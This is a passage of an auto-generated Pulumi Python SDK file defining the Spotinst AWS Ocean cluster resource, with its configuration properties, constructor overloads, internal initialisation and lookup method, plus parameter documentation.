:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelists: Instance types allowed in the Ocean cluster. Cannot be configured if `blacklist` is configured.
"""
if associate_public_ip_address is not None:
pulumi.set(__self__, "associate_public_ip_address", associate_public_ip_address)
if autoscaler is not None:
pulumi.set(__self__, "autoscaler", autoscaler)
if blacklists is not None:
pulumi.set(__self__, "blacklists", blacklists)
if controller_id is not None:
pulumi.set(__self__, "controller_id", controller_id)
if desired_capacity is not None:
pulumi.set(__self__, "desired_capacity", desired_capacity)
if draining_timeout is not None:
pulumi.set(__self__, "draining_timeout", draining_timeout)
if ebs_optimized is not None:
pulumi.set(__self__, "ebs_optimized", ebs_optimized)
if fallback_to_ondemand is not None:
pulumi.set(__self__, "fallback_to_ondemand", fallback_to_ondemand)
if grace_period is not None:
pulumi.set(__self__, "grace_period", grace_period)
if iam_instance_profile is not None:
pulumi.set(__self__, "iam_instance_profile", iam_instance_profile)
if image_id is not None:
pulumi.set(__self__, "image_id", image_id)
if instance_metadata_options is not None:
pulumi.set(__self__, "instance_metadata_options", instance_metadata_options)
if key_name is not None:
pulumi.set(__self__, "key_name", key_name)
if load_balancers is not None:
pulumi.set(__self__, "load_balancers", load_balancers)
if logging is not None:
pulumi.set(__self__, "logging", logging)
if max_size is not None:
pulumi.set(__self__, "max_size", max_size)
if min_size is not None:
pulumi.set(__self__, "min_size", min_size)
if monitoring is not None:
pulumi.set(__self__, "monitoring", monitoring)
if name is not None:
pulumi.set(__self__, "name", name)
if region is not None:
pulumi.set(__self__, "region", region)
if root_volume_size is not None:
pulumi.set(__self__, "root_volume_size", root_volume_size)
if scheduled_tasks is not None:
pulumi.set(__self__, "scheduled_tasks", scheduled_tasks)
if security_groups is not None:
pulumi.set(__self__, "security_groups", security_groups)
if spot_percentage is not None:
pulumi.set(__self__, "spot_percentage", spot_percentage)
if subnet_ids is not None:
pulumi.set(__self__, "subnet_ids", subnet_ids)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if update_policy is not None:
pulumi.set(__self__, "update_policy", update_policy)
if use_as_template_only is not None:
pulumi.set(__self__, "use_as_template_only", use_as_template_only)
if user_data is not None:
pulumi.set(__self__, "user_data", user_data)
if utilize_commitments is not None:
pulumi.set(__self__, "utilize_commitments", utilize_commitments)
if utilize_reserved_instances is not None:
pulumi.set(__self__, "utilize_reserved_instances", utilize_reserved_instances)
if whitelists is not None:
pulumi.set(__self__, "whitelists", whitelists)
@property
@pulumi.getter(name="associatePublicIpAddress")
def associate_public_ip_address(self) -> Optional[pulumi.Input[bool]]:
"""
Configure public IP address allocation.
"""
return pulumi.get(self, "associate_public_ip_address")
@associate_public_ip_address.setter
def associate_public_ip_address(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "associate_public_ip_address", value)
@property
@pulumi.getter
def autoscaler(self) -> Optional[pulumi.Input['OceanAutoscalerArgs']]:
"""
Describes the Ocean Kubernetes Auto Scaler.
"""
return pulumi.get(self, "autoscaler")
@autoscaler.setter
def autoscaler(self, value: Optional[pulumi.Input['OceanAutoscalerArgs']]):
pulumi.set(self, "autoscaler", value)
@property
@pulumi.getter
def blacklists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Instance types not allowed in the Ocean cluster. Cannot be configured if `whitelist` is configured.
"""
return pulumi.get(self, "blacklists")
@blacklists.setter
def blacklists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "blacklists", value)
@property
@pulumi.getter(name="controllerId")
def controller_id(self) -> Optional[pulumi.Input[str]]:
"""
A unique identifier used for connecting the Ocean SaaS platform and the Kubernetes cluster. Typically, the cluster name is used as its identifier.
"""
return pulumi.get(self, "controller_id")
@controller_id.setter
def controller_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "controller_id", value)
@property
@pulumi.getter(name="desiredCapacity")
def desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
The number of instances to launch and maintain in the cluster.
"""
return pulumi.get(self, "desired_capacity")
@desired_capacity.setter
def desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "desired_capacity", value)
@property
@pulumi.getter(name="drainingTimeout")
def draining_timeout(self) -> Optional[pulumi.Input[int]]:
"""
The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
"""
return pulumi.get(self, "draining_timeout")
@draining_timeout.setter
def draining_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "draining_timeout", value)
@property
@pulumi.getter(name="ebsOptimized")
def ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
Enable EBS-optimized instances for the cluster. This flag enables optimized capacity for high-bandwidth connectivity to the EBS service for instance types that are not EBS-optimized. For instances that are EBS-optimized, this flag is ignored.
"""
return pulumi.get(self, "ebs_optimized")
@ebs_optimized.setter
def ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ebs_optimized", value)
@property
@pulumi.getter(name="fallbackToOndemand")
def fallback_to_ondemand(self) -> Optional[pulumi.Input[bool]]:
"""
If no Spot instance markets are available, enable Ocean to launch On-Demand instances instead.
"""
return pulumi.get(self, "fallback_to_ondemand")
@fallback_to_ondemand.setter
def fallback_to_ondemand(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "fallback_to_ondemand", value)
@property
@pulumi.getter(name="gracePeriod")
def grace_period(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after the instance has launched to start checking its health.
"""
return pulumi.get(self, "grace_period")
@grace_period.setter
def grace_period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "grace_period", value)
@property
@pulumi.getter(name="iamInstanceProfile")
def iam_instance_profile(self) -> Optional[pulumi.Input[str]]:
"""
The instance profile IAM role.
"""
return pulumi.get(self, "iam_instance_profile")
@iam_instance_profile.setter
def iam_instance_profile(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "iam_instance_profile", value)
@property
@pulumi.getter(name="imageId")
def image_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the image used to launch the instances.
"""
return pulumi.get(self, "image_id")
@image_id.setter
def image_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_id", value)
@property
@pulumi.getter(name="instanceMetadataOptions")
def instance_metadata_options(self) -> Optional[pulumi.Input['OceanInstanceMetadataOptionsArgs']]:
"""
Ocean instance metadata options object for IMDSv2.
"""
return pulumi.get(self, "instance_metadata_options")
@instance_metadata_options.setter
def instance_metadata_options(self, value: Optional[pulumi.Input['OceanInstanceMetadataOptionsArgs']]):
pulumi.set(self, "instance_metadata_options", value)
@property
@pulumi.getter(name="keyName")
def key_name(self) -> Optional[pulumi.Input[str]]:
"""
The key pair to attach to the instances.
"""
return pulumi.get(self, "key_name")
@key_name.setter
def key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_name", value)
@property
@pulumi.getter(name="loadBalancers")
def load_balancers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]]]:
"""
Array of load balancer objects to add to the Ocean cluster.
"""
return pulumi.get(self, "load_balancers")
@load_balancers.setter
def load_balancers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]]]):
pulumi.set(self, "load_balancers", value)
@property
@pulumi.getter
def logging(self) -> Optional[pulumi.Input['OceanLoggingArgs']]:
"""
Logging configuration.
"""
return pulumi.get(self, "logging")
@logging.setter
def logging(self, value: Optional[pulumi.Input['OceanLoggingArgs']]):
pulumi.set(self, "logging", value)
@property
@pulumi.getter(name="maxSize")
def max_size(self) -> Optional[pulumi.Input[int]]:
"""
The upper limit of instances the cluster can scale up to.
"""
return pulumi.get(self, "max_size")
@max_size.setter
def max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_size", value)
@property
@pulumi.getter(name="minSize")
def min_size(self) -> Optional[pulumi.Input[int]]:
"""
The lower limit of instances the cluster can scale down to.
"""
return pulumi.get(self, "min_size")
@min_size.setter
def min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_size", value)
@property
@pulumi.getter
def monitoring(self) -> Optional[pulumi.Input[bool]]:
"""
Enable detailed monitoring for the cluster. This flag enables CloudWatch detailed monitoring (one-minute increments). Note: there are additional hourly costs for this service based on the region used.
"""
return pulumi.get(self, "monitoring")
@monitoring.setter
def monitoring(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "monitoring", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Required if type is set to `CLASSIC`
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region the cluster will run in.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="rootVolumeSize")
def root_volume_size(self) -> Optional[pulumi.Input[int]]:
"""
The size (in GB) to allocate for the root volume. Minimum `20`.
"""
return pulumi.get(self, "root_volume_size")
@root_volume_size.setter
def root_volume_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "root_volume_size", value)
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]]]:
"""
Set scheduling object.
"""
return pulumi.get(self, "scheduled_tasks")
@scheduled_tasks.setter
def scheduled_tasks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]]]):
pulumi.set(self, "scheduled_tasks", value)
@property
@pulumi.getter(name="securityGroups")
def security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
One or more security group ids.
"""
return pulumi.get(self, "security_groups")
@security_groups.setter
def security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "security_groups", value)
@property
@pulumi.getter(name="spotPercentage")
def spot_percentage(self) -> Optional[pulumi.Input[int]]:
"""
The percentage of Spot instances that would spin up from the `desired_capacity` number.
"""
return pulumi.get(self, "spot_percentage")
@spot_percentage.setter
def spot_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "spot_percentage", value)
@property
@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public IP.
"""
return pulumi.get(self, "subnet_ids")
@subnet_ids.setter
def subnet_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "subnet_ids", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]]]:
"""
Optionally adds tags to instances launched in an Ocean cluster.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="updatePolicy")
def update_policy(self) -> Optional[pulumi.Input['OceanUpdatePolicyArgs']]:
return pulumi.get(self, "update_policy")
@update_policy.setter
def update_policy(self, value: Optional[pulumi.Input['OceanUpdatePolicyArgs']]):
pulumi.set(self, "update_policy", value)
@property
@pulumi.getter(name="useAsTemplateOnly")
def use_as_template_only(self) -> Optional[pulumi.Input[bool]]:
"""
When set to `true`, the launch specification defined on the Ocean object functions only as a template for virtual node groups (VNGs).
In that case, make sure each custom VNG defines an `initial_nodes` parameter so that nodes are created for the VNG when the Ocean resource is created.
"""
return pulumi.get(self, "use_as_template_only")
@use_as_template_only.setter
def use_as_template_only(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "use_as_template_only", value)
@property
@pulumi.getter(name="userData")
def user_data(self) -> Optional[pulumi.Input[str]]:
"""
Base64-encoded MIME user data to make available to the instances.
"""
return pulumi.get(self, "user_data")
@user_data.setter
def user_data(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user_data", value)
@property
@pulumi.getter(name="utilizeCommitments")
def utilize_commitments(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "utilize_commitments")
@utilize_commitments.setter
def utilize_commitments(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "utilize_commitments", value)
@property
@pulumi.getter(name="utilizeReservedInstances")
def utilize_reserved_instances(self) -> Optional[pulumi.Input[bool]]:
"""
If Reserved instances exist, Ocean will utilize them before launching Spot instances.
"""
return pulumi.get(self, "utilize_reserved_instances")
@utilize_reserved_instances.setter
def utilize_reserved_instances(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "utilize_reserved_instances", value)
@property
@pulumi.getter
def whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Instance types allowed in the Ocean cluster. Cannot be configured if `blacklist` is configured.
"""
return pulumi.get(self, "whitelists")
@whitelists.setter
def whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "whitelists", value)
class Ocean(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
associate_public_ip_address: Optional[pulumi.Input[bool]] = None,
autoscaler: Optional[pulumi.Input[pulumi.InputType['OceanAutoscalerArgs']]] = None,
blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
controller_id: Optional[pulumi.Input[str]] = None,
desired_capacity: Optional[pulumi.Input[int]] = None,
draining_timeout: Optional[pulumi.Input[int]] = None,
ebs_optimized: Optional[pulumi.Input[bool]] = None,
fallback_to_ondemand: Optional[pulumi.Input[bool]] = None,
grace_period: Optional[pulumi.Input[int]] = None,
iam_instance_profile: Optional[pulumi.Input[str]] = None,
image_id: Optional[pulumi.Input[str]] = None,
instance_metadata_options: Optional[pulumi.Input[pulumi.InputType['OceanInstanceMetadataOptionsArgs']]] = None,
key_name: Optional[pulumi.Input[str]] = None,
load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanLoadBalancerArgs']]]]] = None,
logging: Optional[pulumi.Input[pulumi.InputType['OceanLoggingArgs']]] = None,
max_size: Optional[pulumi.Input[int]] = None,
min_size: Optional[pulumi.Input[int]] = None,
monitoring: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
root_volume_size: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanScheduledTaskArgs']]]]] = None,
security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
spot_percentage: Optional[pulumi.Input[int]] = None,
subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanTagArgs']]]]] = None,
update_policy: Optional[pulumi.Input[pulumi.InputType['OceanUpdatePolicyArgs']]] = None,
use_as_template_only: Optional[pulumi.Input[bool]] = None,
user_data: Optional[pulumi.Input[str]] = None,
utilize_commitments: Optional[pulumi.Input[bool]] = None,
utilize_reserved_instances: Optional[pulumi.Input[bool]] = None,
whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Create an Ocean resource with the given unique name, props, and options.
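
Example usage (an illustrative sketch, not generated provider documentation; every value below is a placeholder, and `subnet_ids`/`security_groups` are shown because the provider requires them):

```python
import pulumi_spotinst as spotinst

example = spotinst.aws.Ocean("example",
    controller_id="my-ocean-cluster",
    region="us-west-2",
    min_size=1,
    max_size=10,
    subnet_ids=["subnet-0123456789abcdef0"],
    security_groups=["sg-0123456789abcdef0"],
    image_id="ami-12345678",
    fallback_to_ondemand=True)
```
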
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] associate_public_ip_address: Configure public IP address allocation.
:param pulumi.Input[pulumi.InputType['OceanAutoscalerArgs']] autoscaler: Describes the Ocean Kubernetes Auto Scaler.
:param pulumi.Input[Sequence[pulumi.Input[str]]] blacklists: Instance types not allowed in the Ocean cluster. Cannot be configured if `whitelist` is configured.
:param pulumi.Input[str] controller_id: A unique identifier used for connecting the Ocean SaaS platform and the Kubernetes cluster. Typically, the cluster name is used as its identifier.
:param pulumi.Input[int] desired_capacity: The number of instances to launch and maintain in the cluster.
:param pulumi.Input[int] draining_timeout: The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
:param pulumi.Input[bool] ebs_optimized: Enable EBS-optimized instances for the cluster. This flag enables optimized capacity for high-bandwidth connectivity to the EBS service for instance types that are not EBS-optimized. For instances that are EBS-optimized, this flag is ignored.
:param pulumi.Input[bool] fallback_to_ondemand: If no Spot instance markets are available, enable Ocean to launch On-Demand instances instead.
:param pulumi.Input[int] grace_period: The amount of time, in seconds, after the instance has launched to start checking its health.
:param pulumi.Input[str] iam_instance_profile: The instance profile IAM role.
:param pulumi.Input[str] image_id: ID of the image used to launch the instances.
:param pulumi.Input[pulumi.InputType['OceanInstanceMetadataOptionsArgs']] instance_metadata_options: Ocean instance metadata options object for IMDSv2.
:param pulumi.Input[str] key_name: The key pair to attach to the instances.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanLoadBalancerArgs']]]] load_balancers: Array of load balancer objects to add to the Ocean cluster.
:param pulumi.Input[pulumi.InputType['OceanLoggingArgs']] logging: Logging configuration.
:param pulumi.Input[int] max_size: The upper limit of instances the cluster can scale up to.
:param pulumi.Input[int] min_size: The lower limit of instances the cluster can scale down to.
:param pulumi.Input[bool] monitoring: Enable detailed monitoring for the cluster. This flag enables CloudWatch detailed monitoring (one-minute increments). Note: there are additional hourly costs for this service based on the region used.
:param pulumi.Input[str] name: Required if type is set to `CLASSIC`
:param pulumi.Input[str] region: The region the cluster will run in.
:param pulumi.Input[int] root_volume_size: The size (in GB) to allocate for the root volume. Minimum `20`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanScheduledTaskArgs']]]] scheduled_tasks: Set scheduling object.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_groups: One or more security group ids.
:param pulumi.Input[int] spot_percentage: The percentage of Spot instances that would spin up from the `desired_capacity` number.
:param pulumi.Input[Sequence[pulumi.Input[str]]] subnet_ids: A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public IP.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanTagArgs']]]] tags: Optionally adds tags to instances launched in an Ocean cluster.
:param pulumi.Input[bool] use_as_template_only: When set to `true`, the launch specification defined on the Ocean object functions only as a template for virtual node groups (VNGs).
       In that case, make sure each custom VNG defines an `initial_nodes` parameter so that nodes are created for the VNG when the Ocean resource is created.
:param pulumi.Input[str] user_data: Base64-encoded MIME user data to make available to the instances.
:param pulumi.Input[bool] utilize_reserved_instances: If Reserved instances exist, Ocean will utilize them before launching Spot instances.
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelists: Instance types allowed in the Ocean cluster. Cannot be configured if `blacklist` is configured.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: OceanArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create an Ocean resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param OceanArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
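        # Dispatch between the two overloads: callers either pass a fully-typed OceanArgs
        # object or plain keyword arguments; both paths end up in _internal_init.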
resource_args, opts = _utilities.get_resource_args_opts(OceanArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
associate_public_ip_address: Optional[pulumi.Input[bool]] = None,
autoscaler: Optional[pulumi.Input[pulumi.InputType['OceanAutoscalerArgs']]] = None,
blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
controller_id: Optional[pulumi.Input[str]] = None,
desired_capacity: Optional[pulumi.Input[int]] = None,
draining_timeout: Optional[pulumi.Input[int]] = None,
ebs_optimized: Optional[pulumi.Input[bool]] = None,
fallback_to_ondemand: Optional[pulumi.Input[bool]] = None,
grace_period: Optional[pulumi.Input[int]] = None,
iam_instance_profile: Optional[pulumi.Input[str]] = None,
image_id: Optional[pulumi.Input[str]] = None,
instance_metadata_options: Optional[pulumi.Input[pulumi.InputType['OceanInstanceMetadataOptionsArgs']]] = None,
key_name: Optional[pulumi.Input[str]] = None,
load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanLoadBalancerArgs']]]]] = None,
logging: Optional[pulumi.Input[pulumi.InputType['OceanLoggingArgs']]] = None,
max_size: Optional[pulumi.Input[int]] = None,
min_size: Optional[pulumi.Input[int]] = None,
monitoring: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
root_volume_size: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanScheduledTaskArgs']]]]] = None,
security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
spot_percentage: Optional[pulumi.Input[int]] = None,
subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanTagArgs']]]]] = None,
update_policy: Optional[pulumi.Input[pulumi.InputType['OceanUpdatePolicyArgs']]] = None,
use_as_template_only: Optional[pulumi.Input[bool]] = None,
user_data: Optional[pulumi.Input[str]] = None,
utilize_commitments: Optional[pulumi.Input[bool]] = None,
utilize_reserved_instances: Optional[pulumi.Input[bool]] = None,
whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = OceanArgs.__new__(OceanArgs)
__props__.__dict__["associate_public_ip_address"] = associate_public_ip_address
__props__.__dict__["autoscaler"] = autoscaler
__props__.__dict__["blacklists"] = blacklists
__props__.__dict__["controller_id"] = controller_id
__props__.__dict__["desired_capacity"] = desired_capacity
__props__.__dict__["draining_timeout"] = draining_timeout
__props__.__dict__["ebs_optimized"] = ebs_optimized
__props__.__dict__["fallback_to_ondemand"] = fallback_to_ondemand
__props__.__dict__["grace_period"] = grace_period
__props__.__dict__["iam_instance_profile"] = iam_instance_profile
__props__.__dict__["image_id"] = image_id
__props__.__dict__["instance_metadata_options"] = instance_metadata_options
__props__.__dict__["key_name"] = key_name
__props__.__dict__["load_balancers"] = load_balancers
__props__.__dict__["logging"] = logging
__props__.__dict__["max_size"] = max_size
__props__.__dict__["min_size"] = min_size
__props__.__dict__["monitoring"] = monitoring
__props__.__dict__["name"] = name
__props__.__dict__["region"] = region
__props__.__dict__["root_volume_size"] = root_volume_size
__props__.__dict__["scheduled_tasks"] = scheduled_tasks
if security_groups is None and not opts.urn:
raise TypeError("Missing required property 'security_groups'")
__props__.__dict__["security_groups"] = security_groups
__props__.__dict__["spot_percentage"] = spot_percentage
if subnet_ids is None and not opts.urn:
raise TypeError("Missing required property 'subnet_ids'")
__props__.__dict__["subnet_ids"] = subnet_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["update_policy"] = update_policy
__props__.__dict__["use_as_template_only"] = use_as_template_only
__props__.__dict__["user_data"] = user_data
__props__.__dict__["utilize_commitments"] = utilize_commitments
__props__.__dict__["utilize_reserved_instances"] = utilize_reserved_instances
__props__.__dict__["whitelists"] = whitelists
super(Ocean, __self__).__init__(
'spotinst:aws/ocean:Ocean',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
associate_public_ip_address: Optional[pulumi.Input[bool]] = None,
autoscaler: Optional[pulumi.Input[pulumi.InputType['OceanAutoscalerArgs']]] = None,
blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
controller_id: Optional[pulumi.Input[str]] = None,
desired_capacity: Optional[pulumi.Input[int]] = None,
draining_timeout: Optional[pulumi.Input[int]] = None,
ebs_optimized: Optional[pulumi.Input[bool]] = None,
fallback_to_ondemand: Optional[pulumi.Input[bool]] = None,
grace_period: Optional[pulumi.Input[int]] = None,
iam_instance_profile: Optional[pulumi.Input[str]] = None,
image_id: Optional[pulumi.Input[str]] = None,
instance_metadata_options: Optional[pulumi.Input[pulumi.InputType['OceanInstanceMetadataOptionsArgs']]] = None,
key_name: Optional[pulumi.Input[str]] = None,
load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanLoadBalancerArgs']]]]] = None,
logging: Optional[pulumi.Input[pulumi.InputType['OceanLoggingArgs']]] = None,
max_size: Optional[pulumi.Input[int]] = None,
min_size: Optional[pulumi.Input[int]] = None,
monitoring: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
root_volume_size: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanScheduledTaskArgs']]]]] = None,
security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
spot_percentage: Optional[pulumi.Input[int]] = None,
subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanTagArgs']]]]] = None,
update_policy: Optional[pulumi.Input[pulumi.InputType['OceanUpdatePolicyArgs']]] = None,
use_as_template_only: Optional[pulumi.Input[bool]] = None,
user_data: Optional[pulumi.Input[str]] = None,
utilize_commitments: Optional[pulumi.Input[bool]] = None,
utilize_reserved_instances: Optional[pulumi.Input[bool]] = None,
whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'Ocean':
"""
Get an existing Ocean resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
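
A minimal illustrative sketch of rehydrating an existing cluster (the resource name and provider ID below are placeholders):

```python
import pulumi_spotinst as spotinst

existing = spotinst.aws.Ocean.get("existing-ocean", id="o-1234abcd")
```
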
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] associate_public_ip_address: Configure public IP address allocation.
:param pulumi.Input[pulumi.InputType['OceanAutoscalerArgs']] autoscaler: Describes the Ocean Kubernetes Auto Scaler.
:param pulumi.Input[Sequence[pulumi.Input[str]]] blacklists: Instance types not allowed in the Ocean cluster. Cannot be configured if `whitelist` is configured.
:param pulumi.Input[str] controller_id: A unique identifier used for connecting the Ocean SaaS platform and the Kubernetes cluster. Typically, the cluster name is used as its identifier.
:param pulumi.Input[int] desired_capacity: The number of instances to launch and maintain in the cluster.
:param pulumi.Input[int] draining_timeout: The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
:param pulumi.Input[bool] ebs_optimized: Enable EBS-optimized instances for the cluster. This flag enables optimized capacity for high-bandwidth connectivity to the EBS service for instance types that are not EBS-optimized. For instances that are EBS-optimized, this flag is ignored.
:param pulumi.Input[bool] fallback_to_ondemand: If no Spot instance markets are available, enable Ocean to launch On-Demand instances instead.
:param pulumi.Input[int] grace_period: The amount of time, in seconds, after the instance has launched to start checking its health.
:param pulumi.Input[str] iam_instance_profile: The instance profile IAM role.
:param pulumi.Input[str] image_id: ID of the image used to launch the instances.
:param pulumi.Input[pulumi.InputType['OceanInstanceMetadataOptionsArgs']] instance_metadata_options: Ocean instance metadata options object for IMDSv2.
:param pulumi.Input[str] key_name: The key pair to attach to the instances.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanLoadBalancerArgs']]]] load_balancers: Array of load balancer objects to add to the Ocean cluster.
:param pulumi.Input[pulumi.InputType['OceanLoggingArgs']] logging: Logging configuration.
:param pulumi.Input[int] max_size: The upper limit of instances the cluster can scale up to.
:param pulumi.Input[int] min_size: The lower limit of instances the cluster can scale down to.
:param pulumi.Input[bool] monitoring: Enable detailed monitoring for the cluster. This flag enables CloudWatch detailed monitoring (one-minute increments). Note: there are additional hourly costs for this service based on the region used.
:param pulumi.Input[str] name: Required if type is set to `CLASSIC`
:param pulumi.Input[str] region: The region the cluster will run in.
:param pulumi.Input[int] root_volume_size: The size (in GB) to allocate for the root volume. Minimum `20`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanScheduledTaskArgs']]]] scheduled_tasks: Set scheduling object.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_groups: One or more security group ids.
:param pulumi.Input[int] spot_percentage: The percentage of Spot instances that would spin up from the `desired_capacity` number.
:param pulumi.Input[Sequence[pulumi.Input[str]]] subnet_ids: A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public IP.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['OceanTagArgs']]]] tags: Optionally adds tags to instances launched in an Ocean cluster.
